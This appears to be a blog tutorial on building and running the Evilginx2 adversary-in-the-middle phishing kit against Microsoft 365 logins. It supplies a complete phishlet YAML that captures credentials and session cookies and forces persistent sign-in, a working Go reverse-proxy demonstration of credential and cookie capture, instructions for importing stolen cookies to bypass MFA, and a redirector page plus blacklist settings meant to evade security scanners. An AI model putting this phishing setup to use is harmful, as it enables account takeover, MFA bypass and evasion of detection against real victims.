Evilginx 101: Introduction to Modern Phishing & Adversary-in-the-Middle Attacks

Evilginx2 - Modern phishing

What is an Adversary-in-the-Middle (AiTM) Attack?

An Adversary-in-the-Middle (AiTM) attack is a phishing technique in which the attacker sits between the victim and a legitimate service, relaying and manipulating the traffic between them. Traditional phishing stops at tricking the user into typing credentials into a fake login page; an AiTM attack goes further and captures the authentication tokens and session cookies the real service issues after a successful login, which lets the attacker bypass Multi-Factor Authentication (MFA) and use the victim's account for as long as the stolen session stays valid.

💡
In an AiTM attack, the attacker acts as a proxy between the user and the legitimate website, relaying requests and responses in real-time.

This allows them to:

  • Capture login credentials as they are entered
  • Steal session cookies to impersonate the victim
  • Maintain access even after the user changes their password, because some services do not invalidate existing sessions on a password change

How AiTM Attacks Differ from Traditional Phishing:

Feature | Traditional Phishing | AiTM Attack
Method | Fake login page that collects credentials | Reverse proxy that relays the victim's traffic to the real site in real time
MFA bypass | Captured credentials alone are not enough once MFA is enabled | Bypasses MFA by stealing the session cookie issued after the victim completes MFA
Persistence | Requires repeated phishing attempts | Long-term access via the stolen session token, for as long as it remains valid
Detection | Easier to spot with phishing awareness training (wrong domain, page that does nothing after login) | Harder to spot: the victim really logs in and the proxied site behaves exactly like the original

What is Evilginx2?

Evilginx2 is an adversary-in-the-middle (AiTM) phishing toolkit that captures login credentials and authentication tokens by acting as a transparent reverse proxy between the victim and the real site. Because the victim completes the genuine login, including any second factor, Evilginx ends up holding the resulting session cookies; an attacker or penetration tester can then import those cookies into their own browser and access the account without entering the victim's password or completing MFA again.

Evilginx Workflow

Setting up Evilginx on a remote server

Install requirements: Evilginx2 is written in Go, so you need git and a Go toolchain on the machine you build on.

Build Evilginx from source:

Download Evilginx source code:

git clone https://github.com/kgretzky/evilginx2.git

Navigate to the directory and run:

make

Deploy to a remote server:

If you deploy directly on a server, it needs three ports reachable from the internet: TCP 443 (the proxied phishing site), TCP 80 (used for the Let's Encrypt certificate challenges) and UDP 53 (Evilginx's built-in DNS server). Make sure no other service, such as systemd-resolved, is already listening on them.

First, register a domain.

💡
Suppose your server has the IP address 183.11.23.22, and your domain is tontac.phish.

Point the domain at this IP address. Because Evilginx answers DNS for the phishing hostnames itself, the usual setup is to create two nameserver (glue) records at your registrar, for example ns1.tontac.phish and ns2.tontac.phish, both resolving to 183.11.23.22, and to set them as the domain's authoritative nameservers.

Then, from the build directory that make created (the binary and the phishlets directory are copied there), run Evilginx:

./evilginx

I recommend adding the -debug flag to get detailed output and understand exactly what is happening:

./evilginx -debug

First, set the server's IPv4 address and the phishing domain in the Evilginx config (the config ipv4 and config domain console commands):

Then add a phishlet named o365-mfa.yaml to the ./phishlets directory:

💡
Phishlets are small YAML configuration files that tell Evilginx which site to proxy, which cookies make up a session and where the credentials are in the login request; one phishlet targets one website.
name: 'o365-mfa'
author: '@tontac'
min_ver: '2.4.0'

# Hosts to proxy: login.<your domain> fronts login.microsoftonline.com.
# session: true marks the host whose cookies are captured; is_landing marks the host lures point to.
proxy_hosts:
  - {phish_sub: 'login', orig_sub: 'login', domain: 'microsoftonline.com', session: true, is_landing: true}
  - {phish_sub: 'www', orig_sub: 'www', domain: 'office.com', session: false, is_landing: false}

# No response rewriting rules in this minimal phishlet.
sub_filters:

# Cookies that make up the session; Evilginx reports the session as captured once it has seen all of them.
auth_tokens:
  - domain: '.login.microsoftonline.com'
    keys: ['ESTSAUTH', 'ESTSAUTHPERSISTENT', 'SignInStateCookie']
  - domain: 'login.microsoftonline.com'
    keys: ['ESTSAUTHLIGHT']

# POST fields carrying the username and password; 'search' is a regex whose first capture group is stored.
credentials:
  username:
    key: 'login'
    search: '(.*)'
    type: 'post'
  password:
    key: 'passwd'
    search: '(.*)'
    type: 'post'

# Where the login page lives on the original site.
login:
  domain: 'login.microsoftonline.com'
  path: '/'

# Rewrite POST parameters so the victim's session is persistent ("stay signed in" and remembered MFA).
force_post:
  - path: '/kmsi'
    search:
      - {key: 'LoginOptions', search: '.*'}
    force:
      - {key: 'LoginOptions', value: '1'}
    type: 'post'
  - path: '/common/SAS'
    search:
      - {key: 'rememberMFA', search: '.*'}
    force:
      - {key: 'rememberMFA', value: 'true'}
    type: 'post'

Load the phishlet, bind it to your domain and enable it (the phishlets hostname and phishlets enable console commands); Evilginx then requests a certificate for the phishing hostnames and starts proxying:

Create lures (lures create with the phishlet name, then lures get-url to print the link):

💡
Lures are essentially pre-generated phishing links, which you will be sending out on your engagements. Evilginx provides multiple options to customize your lures.

Now, you can use the generated links to send to your target.

In the next blog, I'll share some phishing strategies. 🙃

When a user falls for the phishing attempt, Evilginx will capture their credentials and session cookies.
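To make that capture concrete, here is an added example written for this post (it is not code from Evilginx) of the AiTM loop in Go, the language Evilginx itself is written in. It stands up a constructed local stand-in for login.microsoftonline.com that issues an ESTSAUTH cookie for a made-up account (alice@example.com / hunter2), puts a reverse proxy in front of it driven by a small Phishlet struct mirroring the auth_tokens and credentials sections of the o365-mfa phishlet above, and submits a login through the proxy as a victim's browser would. The struct, function and account names are this example's own assumptions, not Evilginx types or commands, and nothing here contacts Microsoft. It shows the three things the AiTM description relies on: the Host header is rewritten so the real site sees an ordinary request, the POST fields named in the phishlet are copied out before being relayed, and the session cookie is recorded and re-scoped to the phishing host before it reaches the victim.

```go
package main

import (
	"fmt"
	"io"
	"net/http"
	"net/http/httptest"
	"net/http/httputil"
	"net/url"
	"regexp"
	"strings"
)

// Phishlet is this example's own struct (not an Evilginx type): the phishlet parts that drive capture.
type Phishlet struct {
	AuthTokens map[string]bool   // cookie names treated as session tokens (auth_tokens)
	CredKeys   map[string]string // POST field -> "username" or "password" (credentials)
	CredSearch *regexp.Regexp    // the phishlet 'search' regex; capture group 1 is stored
}

// Session is what the attacker ends up with for one victim.
type Session struct {
	Creds  map[string]string // "username"/"password" -> captured value
	Tokens map[string]string // cookie name -> value
}

// O365 mirrors the auth_tokens and credentials sections of the o365-mfa phishlet.
var O365 = Phishlet{
	AuthTokens: map[string]bool{"ESTSAUTH": true, "ESTSAUTHPERSISTENT": true, "SignInStateCookie": true, "ESTSAUTHLIGHT": true},
	CredKeys:   map[string]string{"login": "username", "passwd": "password"},
	CredSearch: regexp.MustCompile(`(.*)`),
}

// NewPhishProxy fronts origin with a relaying reverse proxy: credentials are read from POST bodies
// on the way in, session cookies from Set-Cookie headers on the way out.
func NewPhishProxy(origin string, p Phishlet, s *Session) *httptest.Server {
	target, _ := url.Parse(origin) // httptest URLs always parse
	rp := httputil.NewSingleHostReverseProxy(target)
	rp.ModifyResponse = func(resp *http.Response) error {
		cookies := resp.Cookies()
		resp.Header.Del("Set-Cookie")
		for _, c := range cookies {
			if p.AuthTokens[c.Name] {
				s.Tokens[c.Name] = c.Value // the attacker's copy of the session
			}
			// Drop Domain (and Secure, as this demo is plain HTTP) so the victim's browser binds the
			// cookie to the phishing host and keeps talking through the proxy.
			c.Domain, c.Secure = "", false
			resp.Header.Add("Set-Cookie", c.String())
		}
		return nil
	}
	return httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if r.Method == http.MethodPost {
			body, _ := io.ReadAll(r.Body)
			form, _ := url.ParseQuery(string(body))
			for key, role := range p.CredKeys {
				if m := p.CredSearch.FindStringSubmatch(form.Get(key)); form.Has(key) && len(m) > 1 {
					s.Creds[role] = m[1]
				}
			}
			r.Body = io.NopCloser(strings.NewReader(string(body))) // body was consumed; restore it
		}
		r.Host = target.Host // the real site sees a normal-looking Host header
		rp.ServeHTTP(w, r)
	}))
}

// NewFakeOrigin is a constructed stand-in for login.microsoftonline.com (nothing contacts Microsoft):
// it issues ESTSAUTH when the made-up account alice@example.com / hunter2 signs in.
func NewFakeOrigin() *httptest.Server {
	return httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if r.URL.Path != "/login" || r.FormValue("login") != "alice@example.com" || r.FormValue("passwd") != "hunter2" {
			http.Error(w, "invalid credentials", http.StatusUnauthorized)
			return
		}
		http.SetCookie(w, &http.Cookie{Name: "ESTSAUTH", Value: "token-abc123", Path: "/", Domain: ".login.microsoftonline.com", Secure: true, HttpOnly: true})
		fmt.Fprint(w, "signed in")
	}))
}

// Demo submits the login through the phishing host as the victim's browser would and returns the
// attacker's capture together with the Set-Cookie header the victim's browser received.
func Demo() (*Session, string, error) {
	origin := NewFakeOrigin()
	s := &Session{Creds: map[string]string{}, Tokens: map[string]string{}}
	proxy := NewPhishProxy(origin.URL, O365, s)
	form := url.Values{"login": {"alice@example.com"}, "passwd": {"hunter2"}}
	resp, err := http.Post(proxy.URL+"/login", "application/x-www-form-urlencoded", strings.NewReader(form.Encode()))
	if err != nil {
		return nil, "", err
	}
	io.Copy(io.Discard, resp.Body)
	resp.Body.Close()
	proxy.Close() // returns only after the proxy handler has finished, so s is safe to read
	origin.Close()
	return s, resp.Header.Get("Set-Cookie"), nil
}

func main() {
	s, setCookie, _ := Demo()
	fmt.Printf("captured %v tokens=%v\nvictim's browser received: %s\n", s.Creds, s.Tokens, setCookie)
}
```

Running it with go run prints the captured username and password, the ESTSAUTH value, and the rewritten Set-Cookie header (Domain and Secure removed) that the victim's browser stored. Evilginx does the same capture over TLS on the phishing domain and additionally rewrites hostnames inside response bodies so that every link keeps pointing back through the proxy; the credential and cookie handling is the same idea.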

Once a session is captured, the sessions command in the Evilginx console shows its cookies in a JSON format that you can import into a browser with the StorageAce extension: https://chromewebstore.google.com/detail/storageace/cpbgcbmddckpmhfbdckeolkkhkjjmplo. Opening the target site in that browser then lands you in the victim's account without a password or MFA prompt.

Evilginx is a powerful framework because it comes with several useful built-in features...

Blacklist

💡
The blacklist feature blocks requests from hosts scanning your Evilginx HTTP server. With the default settings, the originating IP of every unauthorized request (one that does not match a valid lure or an existing session) is added to the blacklist.

Mode | Description
all | Block everything and blacklist every IP that connects.
unauth (default) | Block unauthorized requests and blacklist their IPs.
noadd | Block unauthorized requests but do not add their IPs to the blacklist.
off | Block unauthorized requests but ignore the existing blacklist.

Examples

  • all → Scanning with VirusTotal? Scanner IP gets blocked & blacklisted.
  • unauth → Someone visits a wrong URL? Blocked & blacklisted.
  • noadd → Wrong URL accessed? Blocked, but IP is not blacklisted.
  • off → Already blacklisted IP visits again? Not blocked again, but new unauthorized requests still get blocked.

Redirector

💡
Redirectors are little websites, acting as a landing pages to your phishing links. When anyone clicks on your generated phishing link, they will land on the redirector website. This website should redirect the visitor to the reverse proxied phishing sign-in page, either automatically or by requiring some user interaction.

In short, the redirector is the page visitors land on first; only afterwards are they sent on to the proxied sign-in page. Putting this extra hop in front of the lure is meant to keep automated link scanners (e.g., Google Safe Browsing crawlers) from reaching the phishing page directly.

To create a redirector, go to the evilginx/redirectors directory and create a new folder (e.g., AntiBotScan).

Inside this folder, create an index.html file and use JavaScript to control the redirection. When Evilginx serves the page it replaces the placeholder {lure_url_js} with a JavaScript expression that evaluates to the lure URL. Here is a simple example that redirects the visitor after 2 seconds:

<!DOCTYPE html>
<html>
<head>
    <title>Loading...</title>
    <script>
        // {lure_url_js} is substituted by Evilginx with an expression yielding the lure URL
        document.write('<meta http-equiv="Refresh" content="2; url=' + {lure_url_js} + '">');
    </script>
</head>
<body>
    <p>Loading...</p>
</body>
</html>

In the Evilginx console, attach the redirector to the lure (lure 0 here), pointing it at the redirector you created:

lures edit 0 redirector /root/redirectors/nothingredirect/index.html

In the next post, I'll cover setting up Evilginx with Gophish, configuring a mail server to mimic the target’s email, and more… Stay tuned! 🚀